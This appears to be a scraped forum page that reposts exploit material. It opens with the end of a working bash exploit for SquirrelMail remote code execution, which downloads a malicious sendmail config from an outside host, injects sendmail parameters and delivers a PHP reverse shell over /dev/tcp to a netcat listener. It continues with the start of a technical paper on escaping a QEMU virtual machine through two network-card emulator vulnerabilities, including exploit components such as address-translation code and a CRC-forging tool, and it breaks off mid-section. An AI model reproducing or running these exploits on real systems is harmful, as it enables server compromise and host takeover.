-O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf # Upload config echo -e "\n\n[*] Uploading Sendmail config" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" if [ ${#attachid} -lt 32 ]; then echo "Something went wrong. Failed to upload the sendmail file." exit 2 fi # Create Sendmail cmd string according to selected payload echo -e "\n\n[?] Select payload\n" # SELECT PAYLOAD echo "1 - File write (into /tmp/sqpoc)" echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" echo read -p "[1-2] " pchoice case $pchoice in 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" ;; 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" ;; esac if [ $pchoice -eq 2 ]; then echo read -p "Reverese shell IP: " reverse_ip read -p "Reverese shell PORT: " reverse_port fi # Reverse shell code phprevsh=" <?php \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\"; file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd); system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); ?>" # Set sendmail params in user settings echo -e "\n[*] Injecting Sendmail command parameters" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null if [ $? -ne 0 ]; then echo "Failed to inject sendmail parameters" exit 2 fi # Send email which triggers the RCE vuln and runs phprevsh echo -e "\n[*] Sending the email to trigger the vuln" (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) & if [ $pchoice -eq 2 ]; then echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port" nc -vv -l -p $reverse_port else echo -e "\n[*] The test file should have been written at /tmp/sqpoc" fi grep -q "302 Found" /tmp/sheaders if [ $? -eq 1 ]; then echo "There was a problem with sending email" exit 2 fi # Done echo -e "\n[*] All done. Exiting" Sursa: https://www.exploit-db.com/exploits/41910/
    1 point
  15. |=-----------------------------------------------------------------------=| |=----------------------------=[ VM escape ]=----------------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ QEMU Case Study ]=-------------------------=| |=-----------------------------------------------------------------------=| |=---------------------------=[ Mehdi Talbi ]=---------------------------=| |=--------------------------=[ Paul Fariello ]=--------------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 1 - Introduction 2 - KVW/QEMU Overview 2.1 - Workspace Environment 2.2 - QEMU Memory Layout 2.3 - Address Translation 3 - Memory Leak Exploitation 3.1 - The Vulnerable Code 3.2 - Setting up the Card 3.3 - Exploit 4 - Heap-based Overflow Exploitation 4.1 - The Vulnerable Code 4.2 - Setting up the Card 4.3 - Reversing CRC 4.4 - Exploit 5 - Putting All Together 5.1 - RIP Control 5.2 - Interactive Shell 5.3 - VM-Escape Exploit 5.4 - Limitations 6 - Conclusions 7 - Greets 8 - References 9 - Source Code --[ 1 - Introduction Virtual machines are nowadays heavily deployed for personal use or within the enterprise segment. Network security vendors use for instance different VMs to analyze malwares in a controlled and confined environment. A natural question arises: can the malware escapes from the VM and execute code on the host machine? Last year, Jason Geffner from CrowdStrike, has reported a serious bug in QEMU affecting the virtual floppy drive code that could allow an attacker to escape from the VM [1] to the host. Even if this vulnerability has received considerable attention in the netsec community - probably because it has a dedicated name (VENOM) - it wasn't the first of it's kind. In 2011, Nelson Elhage [2] has reported and successfully exploited a vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is available at [3]. Recently, Xu Liu and Shengping Wang, from Qihoo 360, have showcased at HITB 2016 a successful exploit on KVM/QEMU. They exploited two vulnerabilities (CVE-2015-5165 and CVE-2015-7504) present in two different network card device emulator models, namely, RTL8139 and PCNET. During their presentation, they outlined the main steps towards code execution on the host machine but didn't provide any exploit nor the technical details to reproduce it. In this paper, we provide a in-depth analysis of CVE-2015-5165 (a memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow vulnerability), along with working exploits. The combination of these two exploits allows to break out from a VM and execute code on the target host. We discuss the technical details to exploit the vulnerabilities on QEMU's network card device emulation, and provide generic techniques that could be re-used to exploit future bugs in QEMU. For instance an interactive bindshell that leverages on shared memory areas and shared code. --[ 2 - KVM/QEMU Overview KVM (Kernal-based Virtual Machine) is a kernel module that provides full virtualization infrastructure for user space programs. It allows one to run multiple virtual machines running unmodified Linux or Windows images. The user space component of KVM is included in mainline QEMU (Quick Emulator) which handles especially devices emulation. ----[ 2.1 - Workspace Environment In effort to make things easier to those who want to use the sample code given throughout this paper, we provide here the main steps to reproduce our development environment. Since the vulnerabilities we are targeting has been already patched, we need to checkout the source for QEMU repository and switch to the commit that precedes the fix for these vulnerabilities. Then, we configure QEMU only for target x86_64 and enable debug: $ git clone git://git.qemu-project.org/qemu.git $ cd qemu $ git checkout bd80b59 $ mkdir -p bin/debug/native $ cd bin/debug/native $ ../../../configure --target-list=x86_64-softmmu --enable-debug \ $ --disable-werror $ make In our testing environment, we build QEMU using version 4.9.2 of Gcc. For the rest, we assume that the reader has already a Linux x86_64 image that could be run with the following command line: $ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \ $ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \ $ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \ $ -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback We allocate 2GB of memory and create two network interface cards: RTL8139 and PCNET. We are running QEMU on a Debian 7 running a 3.16 kernel on x_86_64 architecture. ----[ 2.2 - QEMU Memory Layout The physical memory allocated for the guest is actually a mmapp'ed private region in the virtual address space of QEMU. It's important to note that the PROT_EXEC flag is not enabled while allocating the physical memory of the guest. The following figure illustrates how the guest's memory and host's memory cohabits. Guest' processes +--------------------+ Virtual addr space | | +--------------------+ | | \__ Page Table \__ \ \ | | Guest kernel +----+--------------------+----------------+ Guest's phy. memory | | | | +----+--------------------+----------------+ | | \__ \__ \ \ | QEMU process | +----+------------------------------------------+ Virtual addr space | | | +----+------------------------------------------+ | | \__ Page Table \__ \ \ | | +----+-----------------------------------------------++ Physical memory | | || +----+-----------------------------------------------++ Additionaly, QEMU reserves a memory region for BIOS and ROM. These mappings are available in QEMU's maps file: 7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0 7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0 7f18a8992000-7f18ac000000 ---p 00000000 00:00 0 7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib] 7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ... 7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ... 7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ... ... [more shared libs] 7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64] 7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ... 7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ... 7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap] 7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack] 7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso] 7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] A more detailed explanation of memory management in virtualized environment can be found at [4]. ----[ 2.3 - Address Translation Within QEMU there exist two translation layers: - From a guest virtual address to guest physical address. In our exploit, we need to configure network card devices that require DMA access. For example, we need to provide the physical address of Tx/Rx buffers to correctly configure the network card devices. - From a guest physical address to QEMU's virtual address space. In our exploit, we need to inject fake structures and get their precise address in QEMU's virtual address space. On x64 systems, a virtual address is made of a page offset (bits 0-11) and a page number. On linux systems, the pagemap file enables userspace process with CAP_SYS_ADMIN privileges to find out which physical frame each virtual page is mapped to. The pagemap file contains for each virtual page a 64-bit value well-documented in kernel.org [5]: - Bits 0-54 : physical frame number if present. - Bit 55 : page table entry is soft-dirty. - Bit 56 : page exclusively mapped. - Bits 57-60 : zero - Bit 61 : page is file-page or shared-anon. - Bit 62 : page is swapped. - Bit 63 : page is present. To convert a virtual address to a physical one, we rely on Nelson Elhage's code [3]. The following program allocates a buffer, fills it with the string "Where am I?" and prints its physical address: ---[ mmu.c ]--- #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <assert.h> #include <inttypes.h> #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) int fd; uint32_t page_offset(uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1); } uint64_t gva_to_gfn(void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t)addr >> 9) & ~7; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8); if (!(pme & PFN_PRESENT)) return -1; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa(void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1); return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); } int main() { uint8_t *ptr; uint64_t ptr_mem; fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } ptr = malloc(256); strcpy(ptr, "Where am I?"); printf("%s\n", ptr); ptr_mem = gva_to_gpa(ptr); printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem); getchar(); return 0; } If we run the above code inside the guest and attach gdb to the QEMU process, we can see that our buffer is located within the physical address space allocated for the guest. More precisely, we note that the outputted address is actually an offset from the base address of the guest physical memory: root@debian:~# ./mmu Where am I? Your physical address is at 0x78b0d010 (gdb) info proc mappings process 14791 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x7fc314000000 0x7fc314022000 0x22000 0x0 0x7fc314022000 0x7fc318000000 0x3fde000 0x0 0x7fc319dde000 0x7fc31c000000 0x2222000 0x0 0x7fc31c000000 0x7fc39c000000 0x80000000 0x0 ... (gdb) x/s 0x7fc31c000000 + 0x78b0d010 0x7fc394b0d010: "Where am I?" --[ 3 - Memory Leak Exploitation In the following, we will exploit CVE-2015-5165 - a memory leak vulnerability that affects the RTL8139 network card device emulator - in order to reconstruct the memory layout of QEMU. More precisely, we need to leak (i) the base address of the .text segment in order to build our shellcode and (ii) the base address of the physical memory allocated for the guest in order to be able to get the precise address of some injected dummy structures. ----[ 3.1 - The vulnerable Code The REALTEK network card supports two receive/transmit operation modes: C mode and C+ mode. When the card is set up to use C+, the NIC device emulator miscalculates the length of IP packet data and ends up sending more data than actually available in the packet. The vulnerability is present in the rtl8139_cplus_transmit_one function from hw/net/rtl8139.c: /* ip packet header */ ip_header *ip = NULL; int hlen = 0; uint8_t ip_protocol = 0; uint16_t ip_data_len = 0; uint8_t *eth_payload_data = NULL; size_t eth_payload_len = 0; int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12)); if (proto == ETH_P_IP) { DPRINTF("+++ C+ mode has IP packet\n"); /* not aligned */ eth_payload_data = saved_buffer + ETH_HLEN; eth_payload_len = saved_size - ETH_HLEN; ip = (ip_header*)eth_payload_data; if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { DPRINTF("+++ C+ mode packet has bad IP version %d " "expected %d\n", IP_HEADER_VERSION(ip), IP_HEADER_VERSION_4); ip = NULL; } else { hlen = IP_HEADER_LENGTH(ip); ip_protocol = ip->ip_p; ip_data_len = be16_to_cpu(ip->ip_len) - hlen; } } The IP header contains two fields hlen and ip->ip_len that represent the length of the IP header (20 bytes considering a packet without options) and the total length of the packet including the ip header, respectively. As shown at the end of the snippet of code given below, there is no check to ensure that ip->ip_len >= hlen while computing the length of IP data (ip_data_len). As the ip_data_len field is encoded as unsigned short, this leads to sending more data than actually available in the transmit buffer. More precisely, the ip_data_len is later used to compute the length of TCP data that are copied - chunk by chunk if the data exceeds the size of the MTU - into a malloced buffer: int tcp_data_len = ip_data_len - tcp_hlen; int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen; int is_last_frame = 0; for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size) { uint16_t chunk_size = tcp_chunk_size; /* check if this is the last frame */ if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) { is_last_frame = 1; chunk_size = tcp_data_len - tcp_send_offset; } memcpy(data_to_checksum, saved_ip_header + 12, 8); if (tcp_send_offset) { memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size); } /* more code follows */ } So, if we forge a malformed packet with a corrupted length size (e.g. ip->ip_len = hlen - 1), then we can leak approximatively 64 KB from QEMU's heap memory. Instead of sending a single packet, the network card device emulator will end up by sending 43 fragmented packets. ----[ 3.2 - Setting up the Card In order to send our malformed packet and read leaked data, we need to configure first Rx and Tx descriptors buffers on the card, and set up some flags so that our packet flows through the vulnerable code path. The figure below shows the RTL8139 registers. We will not detail all of them but only those which are relevant to our exploit: +---------------------------+----------------------------+ 0x00 | MAC0 | MAR0 | +---------------------------+----------------------------+ 0x10 | TxStatus0 | +--------------------------------------------------------+ 0x20 | TxAddr0 | +-------------------+-------+----------------------------+ 0x30 | RxBuf |ChipCmd| | +-------------+------+------+----------------------------+ 0x40 | TxConfig | RxConfig | ... | +-------------+-------------+----------------------------+ | | | skipping irrelevant registers | | | +---------------------------+--+------+------------------+ 0xd0 | ... | |TxPoll| ... | +-------+------+------------+--+------+--+---------------+ 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... | +-------+------+------------+------------+---------------+ - TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback test mode), TxCRC (do not append CRC to Tx Packets), etc. - RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept broadcast packets), AcceptMulticast (accept multicast packets), etc. - CpCmd: C+ command register used to enable some functions such as CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc. - TxAddr0: Physical memory address of Tx descriptors table. - RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors table. - RxRingAddrHI: High 32-bits physical memory address of Rx descriptors table. - TxPoll: Tell the card to check Tx descriptors. A Rx/Tx-descriptor is defined by the following structure where buf_lo and buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx buffers, respectively. These addresses point to buffers holding packets to be sent/received and must be aligned on page size boundary. The variable dw0 encodes the size of the buffer plus additional flags such as the ownership flag to denote if the buffer is owned by the card or the driver. struct rtl8139_desc { uint32_t dw0; uint32_t dw1; uint32_t buf_lo; uint32_t buf_hi; }; The network card is configured through in*() out*() primitives (from sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following snippet of code configures the card and sets up a single Tx descriptor. #define RTL8139_PORT 0xc000 #define RTL8139_BUFFER_SIZE 1500 struct rtl8139_desc desc; void *rtl8139_tx_buffer; uint32_t phy_mem; rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE); phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer); memset(&desc, 0, sizeof(struct rtl8139_desc)); desc->dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN | CP_TX_IPCS | CP_TX_TCPCS; desc->dw0 += RTL8139_BUFFER_SIZE; desc.buf_lo = phy_mem; iopl(3); outl(TxLoopBack, RTL8139_PORT + TxConfig); outl(AcceptMyPhys, RTL8139_PORT + RxConfig); outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd); outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd); outl(phy_mem, RTL8139_PORT + TxAddr0); outl(0x0, RTL8139_PORT + TxAddr0 + 0x4); ----[ 3.3 - Exploit The full exploit (cve-2015-5165.c) is available inside the attached source code tarball. The exploit configures the required registers on the card and sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet addressed to the MAC address of the card. This enables us to read the leaked data by accessing the configured Rx buffers. While analyzing the leaked data we have observed that several function pointers are present. A closer look reveals that these functions pointers are all members of a same QEMU internal structure: typedef struct ObjectProperty { gchar *name; gchar *type; gchar *description; ObjectPropertyAccessor *get; ObjectPropertyAccessor *set; ObjectPropertyResolve *resolve; ObjectPropertyRelease *release; void *opaque; QTAILQ_ENTRY(ObjectProperty) node; } ObjectProperty; QEMU follows an object model to manage devices, memory regions, etc. At startup, QEMU creates several objects and assigns to them properties. For example, the following call adds a "may-overlap" property to a memory region object. This property is endowed with a getter method to retrieve the value of this boolean property: object_property_add_bool(OBJECT(mr), "may-overlap", memory_region_get_may_overlap, NULL, /* memory_region_set_may_overlap */ &error_abort); The RTL8139 network card device emulator reserves a 64 KB on the heap to reassemble packets. There is a large chance that this allocated buffer fits on the space left free by destroyed object properties. In our exploit, we search for known object properties in the leaked memory. More precisely, we are looking for 80 bytes memory chunks (chunk size of a free'd ObjectProperty structure) where at least one of the function pointers is set (get, set, resolve or release). Even if these addresses are subject to ASLR, we can still guess the base address of the .text section. Indeed, their page offsets are fixed (12 least significant bits or virtual addresses are not randomized). We can do some arithmetics to get the address of some of QEMU's useful functions. We can also derive the address of some LibC functions such as mprotect() and system() from their PLT entries. We have also noticed that the address PHY_MEM + 0x78 is leaked several times, where PHY_MEM is the start address of the physical memory allocated for the guest. The current exploit searches the leaked memory and tries to resolves (i) the base address of the .text segment and (ii) the base address of the physical memory. --[ 4 - Heap-based Overflow Exploitation This section discusses the vulnerability CVE-2015-7504 and provides an exploit that gets control over the %rip register. ----[ 4.1 - The vulnerable Code The AMD PCNET network card emulator is vulnerable to a heap-based overflow when large-size packets are received in loopback test mode. The PCNET device emulator reserves a buffer of 4 kB to store packets. If the ADDFCS flag is enabled on Tx descriptor buffer, the card appends a CRC to received packets as shown in the following snippet of code in pcnet_receive() function from hw/net/pcnet.c. This does not pose a problem if the size of the received packets are less than 4096 - 4 bytes. However, if the packet has exactly 4096 bytes, then we can overflow the destination buffer with 4 bytes. uint8_t *src = s->buffer; /* ... */ if (!s->looptest) { memcpy(src, buf, size); /* no need to compute the CRC */ src[size] = 0; src[size + 1] = 0; src[size + 2] = 0; src[size + 3] = 0; size += 4; } else if (s->looptest == PCNET_LOOPTEST_CRC || !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) { uint32_t fcs = ~0; uint8_t *p = src; while (p != &src[size]) CRC(fcs, *p++); *(uint32_t *)p = htonl(fcs); size += 4; } In the above code, s points to PCNET main structure, where we can see that beyond our vulnerable buffer, we can corrupt the value of the irq variable: struct PCNetState_st { NICState *nic; NICConf conf; QEMUTimer *poll_timer; int rap, isr, lnkst; uint32_t rdra, tdra; uint8_t prom[16]; uint16_t csr[128]; uint16_t bcr[32]; int xmit_pos; uint64_t timer; MemoryRegion mmio; uint8_t buffer[4096]; qemu_irq irq; void (*phys_mem_read)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void (*phys_mem_write)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void *dma_opaque; int tx_busy; int looptest; }; The variable irq is a pointer to IRQState structure that represents a handler to execute: typedef void (*qemu_irq_handler)(void *opaque, int n, int level); struct IRQState { Object parent_obj; qemu_irq_handler handler; void *opaque; int n; }; This handler is called several times by the PCNET card emulator. For instance, at the end of pcnet_receive() function, there is call a to pcnet_update_irq() which in turn calls qemu_set_irq(): void qemu_set_irq(qemu_irq irq, int level) { if (!irq) return; irq->handler(irq->opaque, irq->n, level); } So, what we need to exploit this vulnerability: - allocate a fake IRQState structure with a handler to execute (e.g. system()). - compute the precise address of this allocated fake structure. Thanks to the previous memory leak, we know exactly where our fake structure resides in QEMU's process memory (at some offset from the base address of the guest's physical memory). - forge a 4 kB malicious packets. - patch the packet so that the computed CRC on that packet matches the address of our fake IRQState structure. - send the packet. When this packet is received by the PCNET card, it is handled by the pcnet_receive function() that performs the following actions: - copies the content of the received packet into the buffer variable. - computes a CRC and appends it to the buffer. The buffer is overflowed with 4 bytes and the value of irq variable is corrupted. - calls pcnet_update_irq() that in turns calls qemu_set_irq() with the corrupted irq variable. Out handler is then executed. Note that we can get control over the first two parameters of the substituted handler (irq->opaque and irq->n), but thanks to a little trick that we will see later, we can get control over the third parameter too (level parameter). This will be necessary to call mprotect() function. Note also that we corrupt an 8-byte pointer with 4 bytes. This is sufficient in our testing environment to successfully get control over the %rip register. However, this poses a problem with kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in section 5.4. ----[ 4.2 - Setting up the Card Before going further, we need to set up the PCNET card in order to configure the required flags, set up Tx and Rx descriptor buffers and allocate ring buffers to hold packets to transmit and receive. The AMD PCNET card could be accessed in 16 bits mode or 32 bits mode. This depends on the current value of DWI0 (value stored in the card). In the following, we detail the main registers of the PCNET card in 16 bits access mode as this is the default mode after a card reset: 0 16 +----------------------------------+ | EPROM | +----------------------------------+ | RDP - Data reg for CSR | +----------------------------------+ | RAP - Index reg for CSR and BCR | +----------------------------------+ | Reset reg | +----------------------------------+ | BDP - Data reg for BCR | +----------------------------------+ The card can be reset to default by accessing the reset register. The card has two types of internal registers: CSR (Control and Status Register) and BCR (Bus Control Registers). Both registers are accessed by setting first the index of the register that we want to access in the RAP (Register Address Port) register. For instance, if we want to init and restart the card, we need to set bit0 and bit1 to 1 of register CSR0. This can be done by writing 0 to RAP register in order to select the register CSR0, then by setting register CSR to 0x3: outw(0x0, PCNET_PORT + RAP); outw(0x3, PCNET_PORT + RDP); The configuration of the card could be done by filling an initialization structure and passing the physical address of this structure to the card (through register CSR1 and CSR2): struct pcnet_config { uint16_t mode; /* working mode: promiscusous, looptest, etc. */ uint8_t rlen; /* number of rx descriptors in log2 base */ uint8_t tlen; /* number of tx descriptors in log2 base */ uint8_t mac[6]; /* mac address */ uint16_t _reserved; uint8_t ladr[8]; /* logical address filter */ uint32_t rx_desc; /* physical address of rx descriptor buffer */ uint32_t tx_desc; /* physical address of tx descriptor buffer */ }; ----[ 4.3 - Reversing CRC As discussed previously, we need to fill a packet with data in such a way that the computed CRC matches the address of our fake structure. Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6], we can apply a 4-byte patch to our packet so that the computed CRC matches a value of our choice. The source code reverse-crc.c applies a patch to a pre-filled buffer so that the computed CRC is equal to 0xdeadbeef. ---[ reverse-crc.c ]--- #include <stdio.h> #include <stdint.h> #define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff]) /* generated using the AUTODIN II polynomial * x^32 + x^26 + x^23 + x^22 + x^16 + * x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1 */ static const uint32_t crctab[256] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d, }; uint32_t crc_compute(uint8_t *buffer, size_t size) { uint32_t fcs = ~0; uint8_t *p = buffer; while (p != &buffer[size]) CRC(fcs, *p++); return fcs; } uint32_t crc_reverse(uint32_t current, uint32_t target) { size_t i = 0, j; uint8_t *ptr; uint32_t workspace[2] = { current, target }; for (i = 0; i < 2; i++) workspace[i] &= (uint32_t)~0; ptr = (uint8_t *)(workspace + 1); for (i = 0; i < 4; i++) { j = 0; while(crctab[j] >> 24 != *(ptr + 3 - i)) j++; *((uint32_t *)(ptr - i)) ^= crctab[j]; *(ptr - i - 1) ^= j; } return *(uint32_t *)(ptr - 4); } int main() { uint32_t fcs; uint32_t buffer[2] = { 0xcafecafe }; uint8_t *ptr = (uint8_t *)buffer; fcs = crc_compute(ptr, 4); printf("[+] current crc = %010p, required crc = \n", fcs); fcs = crc_reverse(fcs, 0xdeadbeef); printf("[+] applying patch = %010p\n", fcs); buffer[1] = fcs; fcs = crc_compute(ptr, 8); if (fcs == 0xdeadbeef) printf("[+] crc patched successfully\n"); } ----[ 4.4 - Exploit The exploit (file cve-2015-7504.c from the attached source code tarball) resets the card to its default settings, then configures Tx 